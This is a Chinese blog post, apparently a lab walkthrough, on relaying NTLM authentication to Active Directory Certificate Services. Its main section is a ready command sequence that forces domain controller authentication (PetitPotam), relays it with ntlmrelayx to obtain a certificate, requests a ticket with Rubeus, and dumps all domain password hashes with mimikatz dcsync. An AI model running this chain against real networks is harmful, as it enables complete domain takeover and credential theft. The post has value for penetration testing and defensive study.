AD CS证书服务中继攻击

最新推荐文章于 2023-08-24 18:14:17 发布
最新推荐文章于 2023-08-24 18:14:17 发布
阅读量3.8k 收藏 4
点赞数 4
分类专栏: 内网渗透 文章标签: 内网渗透 域渗透 ADCS攻击 relay
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/123301327
版权

0x1 简介

AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。
在这里插入图片描述

注:借图

0x2 环境信息

域控(windows server 2016):192.168.3.129
辅控(windows server 2016):192.168.3.131(AD CS)
域内主机(windows 10):192.168.3.171
攻击机(kali):192.168.3.158

搭建ADCS证书服务:https://mp.weixin.qq.com/s?__biz=MzI2NDQyNzg1OA==&mid=2247488431&idx=1&sn=6a9b1e785aec5f1d5a8d0ac86a667961&chksm=eaad9392ddda1a842088422e9a0f3a03c04073e52dc432995c917da7ca551ae6bfa114507181&scene=21#wechat_redirect

0x3 漏洞利用

1、查找ADCS证书服务器。
certutil -config - -ping
在这里插入图片描述

2、Authorization HTTP头明确允许通过NTLM进行身份验证。
curl dc2.yaoyao.com/certsrv/ -I
在这里插入图片描述在这里插入图片描述

3、攻击机器开启本地监听并将证书颁发机构(CA)设置为目标。
python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs
python3 ntlmrelayx.py -t http://192.168.3.131/certsrv/certfnsh.asp -smb2support --adcs
在这里插入图片描述

4、可以采用如下方式强制认证。
1)printerbug打印机漏洞

https://github.com/dirkjanm/krbrelayx
#格式:
python printerbug.py domain/username:password@<dc ip> <ntlmrelayx listen ip>

2)dementor.py脚本

https://github.com/NotMedic/NetNTLMtoSilverTicket
#格式:
python dementor.py -d domain -u username -p password <ntlmrelayx listen ip> <dc ip>

3)Petitpotam.py脚本

https://github.com/topotam/PetitPotam
#格式:
python Petitpotam.py -d domain -u username -p password <ntlmrelayx listen ip> <dc ip>

这里采用PetitPotam进行强制认证。(实测printerbug在winserver2016未成功。)
python3 PetitPotam.py -d yaoyao.com -u shanyi -p ‘Admin12345’ 192.168.3.158 192.168.3.129
在这里插入图片描述

5、ntlmrelayx成功获取证书。
在这里插入图片描述

6、利用上面获取到的证书,使用Rubeus获取TGT并注入。

#格式:
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
#示例:
Rubeus.exe asktgt /user:WIN-3IFUE0D5S8U$ /certificate:xxxxxxxxx /ptt

在这里插入图片描述

查看当前导入证书。
在这里插入图片描述

7、使用mimikatz即可导出域内任意用户哈希。

#查看kerberos票据
kerberos::list
#导出krbtgt用户的hash
lsadump::dcsync /user:krbtgt /csv
#导出所有用户的hash
mimikatz.exe "lsadump::dcsync /domain:yaoyao.com /all /csv" exit

在这里插入图片描述

0x4 参考

https://cloud.tencent.com/developer/article/1873728?from=article.detail.1937718
https://cloud.tencent.com/developer/article/1937718?from=article.detail.1896216

LQxdp
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第二章【ADFS集成Exchang实现OWA\ECP单点登录SSO】安装AD证书服务ADCS)
liuzhenhe1988的专栏
09-02 359
ADFS集成Exchang实现OWA\ECP单点登录SSO】安装AD证书服务ADCS)
实训5:配置数字证书服务.docx
06-05
2. 在“AD CS 角色服务”界面中,勾选“证书颁发机构”和“证书颁发机构 Web 注册”复选框。 3. 完成安装后,单击“配置目标服务器上的 Active Directory 证书服务”。 4. 在“AD CS 配置”向导中的“角色服务”界面...
ADCS攻击之探测证书服务
Adminxe的博客
03-05 513
打开组策略,计算机配置\Windows 设置\安全设置\本地策略\安全选项,找到配置 Kerberos 允许的加密类型,将下面全部勾选即可,勾选后,重新启动就可以获取TGT了。判断是否存在,通常控的NetBIOS名称有关键字例如DC字样,fscan也能直接识别,控也会通常开启53&88&389&636端口。1、靶场不成功,记得恢复快照时,统一连接下桥接,同步下时间,每台机器注意网关设置下,记得同步,同步完可以禁用或者去掉桥接网卡。这种报错,有可能是时间不同步的原因,可重启环境重新测试。
渗透笔记-证书服务器(ADCS)安装
NoooEmotion的博客
02-02 2076
AD CS证书服务(SSL证书):可以部署企业根或独立根建立SSL加密通道,这是所有服务证书,无论品牌、申请方式都可以起到的功能,唯一的价值区别在于加密强度,目前,达到128位对称加密强度的服务证书均可以实现有保障的加密通道。
深入分析内ntlm relay to adcs服务的利用(含wireshark抓包分析)
m0_71746299的博客
01-27 267
前言 2021年中旬,specterops发布了一项针对证书服务(adcs)的利用白皮书,文档中提到了19种对adcs服务的利用。本篇主要是分析文中提出的ntlm relay to adcs窃取证书攻击流程,原理和抓包分析。 相关内容 ADCS介绍 Active Directory证书服务(Active Directory Certificate Services,下文简称ADCS)可以向用户,机构和服务颁发证书,收到证书的个体可以使用证书进行内的身份认证,本篇中要利用的是ADCS配置的WEB证书请求
如何建立利用根证书(凭证)签发建立中继证书(凭证)详解
一只青木呀
08-25 1008
建立中继证书在建立中继之前需要自建根证书建立根证书的具体步骤1、建立一个目录存放所有中继资料2、进入中继目录,建立相关的文件夹2.1、进入中继目录,建立相关的文件夹2.2、更改private文件夹得权限2.3、建立index.txt文件2.4、建立serial3、填写 OpenSSL 需要的配置文件4、在中继凭证得目录中产生中继凭证得私钥5、在中继凭证目录产生中继凭证的凭证签发申请6、使用根凭证去签发中继凭证的凭证签发申请档, 产生中继凭证的凭证6.1、签发凭证签发申请档, 有效期限是 3650 天.6.2
大型企业ad服务的搭建与维护
05-03
AD(Active Directory)服务是微软Windows Server操作系统中的核心组件,用于管理和组织网络环境中的用户、计算机、服务和资源。大型企业AD服务的搭建与维护是确保组织内部高效协同工作的重要环节,广泛应用于企业、...
coal.zip_AD9833_cs5532_豪雅ewb9833
07-14
基于MSP430F449的CS5532数据采集及AD9833任意信号发生
windows server 2012 AD服务
06-23
windows server 2012 AD服务
AD芯片CS5532中文版
12-19
AD芯片CS5532中文版PDF CS5531/32/33/34是高集成度的ΔΣ模数转换器,由于运用了电荷平衡技术, 其性能可以达到16 位(CS5531/33)和24位(CS5532/34)。该系列ADC非常适合测量称重仪表、过程控制、科学和医疗等应用...
如何利用中继证书(凭证)建立客户端证书
一只青木呀
08-25 549
利用中继证书(凭证)建立客户端证书建立客户端证书的前提是要建立中继证书建立客户端证书的具体步骤1、建立一个目录,存放所有客户端证书有关的资料2、填写Open SSL的配置文件3、在客户端凭证目录产生凭证的私钥4、在服务器凭证目录产生服务器凭证的凭证签发申请档5、使用中继凭证去签发客户端凭证的凭证签发申请档, 产生客户端的凭证6、检查签发的中继凭证是否无误.7、确认服务器凭证的完整性, 需要做完整的串链检查, 需要使用含有根凭证的凭证串链.8、产生服务器凭证的凭证串链.9、客户端证书建立完成 建立客户端证书
AD CS攻击面剖析
最新发布
2201_75571291的博客
08-24 356
LEE CHRISTENSEN和WILL SCHROEDER于今年9月30日在Black Hat会议上进行了主题为“CERTIFIED PRE-OWNED:SERVICES”的演讲,首次在公开国际会议中讨论了有关活动目录证书服务(Active Directory Certificate Services,ADCS)的攻击面。AD CS是微软免费的证书管理服务,用于微软的 PKI 实施。企业可以使用ADCS通过将个人、设备或服务的身份绑定到相应的私钥来增强安全性。
【Windows Server 2019】Active Directory Certificate Services 证书颁发机构的安装,配置和管理Ⅰ——AD CS的安装和配置
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
07-25 2595
博文主要介绍了Windows Server 2019的证书颁发机构的安装和配置方法。
渗透笔记-ADCS 提权-ESC4
NoooEmotion的博客
02-06 879
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3112
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
如何利用中继证书(凭证)建立服务证书
一只青木呀
08-25 615
利用中继证书(凭证)建立服务证书建立服务证书的前提是要建立中继证书建立服务证书的具体步骤1、建立一个目录,存放所有服务证书有关的资料2、填写Open SSL的配置文件3、在服务器凭证目录产生凭证的私钥4、在服务器凭证目录产生服务器凭证的凭证签发申请档5、使用中继凭证去签发服务器凭证的凭证签发申请档, 产生伺服器的凭证6、检查签发的中继凭证是否无误.7、确认服务器凭证的完整性, 需要做完整的串链检查, 需要使用含有根凭证的凭证串链.8、产生服务器凭证的凭证串链.回到服务证书目录里9、服务证书建立完
非约束委派账户配合printerbug内提权
whojoe的博客
07-16 801
非约束委派账户配合printerbug内提权环境搭建配置非约束委派漏洞复现本地远程 环境搭建 主机 机器名 ip 用户 版本 ad.test.com 192.168.164.147 administrator win2012r2 内机器 user.test.com 192.168.164.129 user1 win2008r2 配置非约束委派 漏洞复现 本地 https://github.com/leechristensen/SpoolSample/. https://
结合CVE-2019-1040漏洞的两种提权利用深度分析
systemino的博客
07-03 4050
0x00 漏洞概述 2019年6月,Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞,攻击者可以通过中间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流量中继到目标服务器。PHP大马 通过这种攻击使得攻击者在仅有一个普通账号的情况下可以远程控制 Windows 内的任何机器,包括服务器。 0x01 漏洞利...
【CentOS7】网络配置
K1nney的博客
07-12 420
1.装好CentOS7后是上不了网的 2.输入dhclient,可以自动获取一个IP地址,再用命令ip addr查看IP 自动获取的IP为192.168.3.131,网卡名称为ens33。 这时候获取的IP是动态的,下次重启系统后,IP地址也会变化,这时候我们可以把系统的IP设置为静态的。 (1)点击VMware虚拟机左上角的“编辑”,选择“虚拟网络编译器”。 (2)选中VMnet8(NAT模...
radius服务ad证书更新
05-18
要更新Radius服务AD证书,需要按照以下步骤操作: 1. 在AD控制器上创建新证书并导出为PKCS#12格式的文件。 2. 在Radius服务器上安装OpenSSL工具,如果未安装的话。 3. 将PKCS#12格式的证书文件复制到Radius...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值